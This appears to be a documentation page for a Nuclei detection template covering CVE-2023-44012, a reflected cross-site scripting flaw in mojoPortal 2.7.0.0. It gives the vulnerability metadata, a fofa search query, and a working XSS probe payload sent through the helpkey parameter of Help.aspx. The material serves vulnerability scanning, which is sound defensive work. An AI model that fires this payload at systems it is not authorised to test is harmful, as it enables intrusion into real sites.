mojoPortal v.2.7.0.0 - Cross-Site Scripting
ID: CVE-2023-44012
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,mojoportal,xss
Description
Section titled “Description”Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.
YAML Source
Section titled “YAML Source”id: CVE-2023-44012
info: name: mojoPortal v.2.7.0.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. impact: | Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability. reference: - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012 - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2023-44012 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44012 cwe-id: CWE-79 epss-score: 0.0009 epss-percentile: 0.37745 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mojoportal product: mojoportal fofa-query: title="mojoPortal" tags: cve,cve2023,mojoportal,xss
http: - method: GET path: - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="
matchers: - type: dsl dsl: - 'contains_any(body, "mojoPortal", "mojo-accordion", "mojo-tabs")' - 'contains(body, "><svg/onload=alert()")' - 'contains(header, "text/html")' - 'status_code == 200' condition: and# digest: 490a004630440220761930fd96f9bdf98b2eadc083701bfe13be740aeb39d8fe453b2e6ce7de8f1c0220711f856facade6376c7f022495abe37014419a4f2a97b4881fa94ba1c8b67e12:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-44012.yaml"